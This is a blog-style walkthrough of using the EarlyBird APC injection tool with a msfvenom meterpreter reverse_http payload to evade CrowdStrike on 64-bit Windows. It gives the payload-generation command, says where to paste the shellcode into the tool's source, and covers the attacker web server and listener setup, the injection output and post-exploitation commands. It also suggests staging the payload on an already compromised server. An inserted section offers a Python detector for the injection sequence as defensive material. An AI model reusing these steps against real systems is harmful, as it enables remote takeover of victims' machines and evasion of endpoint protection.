EarlyBird nabs CrowdStrike’s worm

using code injection of a shell into a trusted process (64-bit)

First, this works on 64-bit Win7 only or 64-bit Win10 only, and since EarlyBird is a C++ attack, every executable must be compiled for the target victim's architecture and must match the selected payload. You must have a known-good executable such as CALC for the injection to succeed. To carry out this attack you also need a web server under attacker control. The victim must have the C++ redistributable installed, which is fairly common to date. The attacker needs Visual Studio. I have tested this with the modules below:

Also grab the EarlyBird tool from GitHub.

First, generate the shellcode (use your favourite in place of this one) so it can be pasted into the template later:

msfvenom -p windows/x64/meterpreter/reverse_http lhost=x.x.x.x lport=4444 -f c

Cut/paste the shellcode from step 1 into the sc_x64 variable, at approximately line 13 of EarlyBird.cpp:

unsigned char sc_x64[] =

Now, using something like MS Visual Studio on the attacker box, build the CPP into an executable.

It is best to use a web server not owned by the attacker but one compromised previously. If needed, you can run a simple Python web server like this:

python -m SimpleHTTPServer 8000

(starts a web server on port 8000 of the attacker box; this is the Python 2 module, on Python 3 the equivalent is python -m http.server 8000)

Start msfconsole on the attacker box, then:

  • use multi/handler (this sets up the listener)

  • set payload windows/x64/meterpreter/reverse_http

  • set LHOST x.x.x.x (this is the attacker IP)

  • set LPORT 4444 (this is the local port and must match step 1)

  • run

In the real world, you must trick the victim into downloading EarlyBird and then running it against a known-trusted Windows executable like CALC.EXE, but that will not be discussed here.

Let us assume control of the victim: download the compiled EarlyBird by visiting http://attacker:8000/EarlyBird.exe.
Then open CMD and run:

    C:\Users\Downloads> EarlyBird.exe C:\Windows\System32\calc.exe
    [*] Creating process in suspended state
    [*] Create process successful!
    [*] Allocating memory in process
    [*] Memory allocated at: 0xb0ab0000
    [*] Writing shellcode to process
    [*] Shellcode is written to memory
    [*] Queue APC
    [*] QueueAPC is done
    [*] Resuing thread….
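The tool output above spells out the exact sequence a defender can key on: a child created suspended, a remote allocation, a remote write, an APC queued, and the thread resumed, all from one source process against one target. As an added example (not code from the original post or from the EarlyBird project), the script below correlates that five-stage sequence over process/API telemetry. The pipe-delimited log format, the PIDs, and the field names are constructed for the example and are not any particular EDR's or Sysmon's output; map them onto whatever your telemetry actually emits.

```python
"""Flag the EarlyBird-style APC injection sequence in process/API telemetry.

Added example, not from the original post. The telemetry format is an
assumption made for this script: time|source_pid|event|target_pid|detail.
"""
from collections import defaultdict

# Stages in the order they must occur for a hit: suspended create ->
# remote allocation -> remote write -> APC queued -> thread resumed.
STAGES = ("ProcessCreate", "VirtualAllocEx", "WriteProcessMemory",
          "QueueUserAPC", "ResumeThread")

# Constructed sample telemetry (not real EDR output). The first five lines
# mirror the tool output above; the last three are a benign cross-process
# pattern (non-suspended create, small write, resume) that must not alert.
SAMPLE_LOG = """\
10:00:01|4100|ProcessCreate|5212|image=C:\\Windows\\System32\\calc.exe flags=CREATE_SUSPENDED
10:00:01|4100|VirtualAllocEx|5212|protect=PAGE_EXECUTE_READWRITE size=0x1000
10:00:01|4100|WriteProcessMemory|5212|size=0x2f0
10:00:01|4100|QueueUserAPC|5212|thread=5216
10:00:02|4100|ResumeThread|5212|thread=5216
10:00:05|6020|ProcessCreate|6100|image=C:\\Windows\\System32\\notepad.exe flags=0
10:00:06|6020|WriteProcessMemory|6100|size=0x40
10:00:07|6020|ResumeThread|6100|thread=6104
"""


def parse_line(line):
    """Split one telemetry line into a dict; return None for malformed lines."""
    parts = line.strip().split("|", 4)
    if len(parts) != 5:
        return None
    time, src, event, dst, detail = parts
    # detail is a space-separated list of key=value pairs
    fields = dict(kv.split("=", 1) for kv in detail.split() if "=" in kv)
    return {"time": time, "src": int(src), "event": event,
            "dst": int(dst), "fields": fields}


def detect(lines):
    """Return one finding per (source, target) pair that walks all STAGES in order.

    Stage 0 only counts when the child was created suspended: an ordinary
    CreateProcess followed by a few cross-process calls is common (debuggers,
    installers), and the suspended create is what makes this pattern distinctive.
    """
    progress = defaultdict(int)   # (src, dst) -> index of the next stage expected
    context = {}                  # (src, dst) -> image path of the target
    findings = []
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue
        key = (ev["src"], ev["dst"])
        stage = progress[key]
        if stage >= len(STAGES):
            continue  # already reported for this pair
        if ev["event"] != STAGES[stage]:
            continue  # unrelated or out-of-order event; keep waiting
        if stage == 0:
            if "CREATE_SUSPENDED" not in ev["fields"].get("flags", ""):
                continue
            context[key] = ev["fields"].get("image", "?")
        progress[key] = stage + 1
        if progress[key] == len(STAGES):
            findings.append({"source_pid": ev["src"], "target_pid": ev["dst"],
                             "image": context[key], "completed_at": ev["time"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG.splitlines()):
        print(f"ALERT: pid {f['source_pid']} queued an APC into suspended "
              f"{f['image']} (pid {f['target_pid']}) at {f['completed_at']}")
```

The strict in-order match keeps the rule quiet on ordinary cross-process activity; if your telemetry delivers events out of order, relax the equality check to a set of seen stages and alert once all five are present, at the cost of a few more benign hits to triage.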

Once the attacker receives the reverse shell in msfconsole, they can run post-exploitation tools such as enumerating the box or capturing a screenshot, as an example only:

    meterpreter > sysinfo
    Computer : DELL-XP200
    OS : Windows 10 (Build 16299)
    Architecture : x64
    System Language : en_US
    Domain : CORP
    Logged On Users : 2
    Meterpreter : x86/windows
    meterpreter > screenshot
    Screenshot saved to: /root/Documents/test/xfer/ll2yp8Sg.jpeg

I have successfully tested/exploited this personally, bypassing CrowdStrike, and told others, but was told this is normal. THIS IS NOT NORMAL, to be bypassed in all these ways by what is not cheap software for big, big companies! Test notes:

  • Success with EarlyBird + standard HTTP meterpreter payload

  • Success with EarlyBird + standard HTTPS meterpreter payload

  • Success with the meterpreter screenshot command

  • Failure with the shell command launch

I am eager to know if others can improve on my results and get more MSF commands to work; it would be fun to try! Please link to me and let me know!

Link to 5 other bypasses
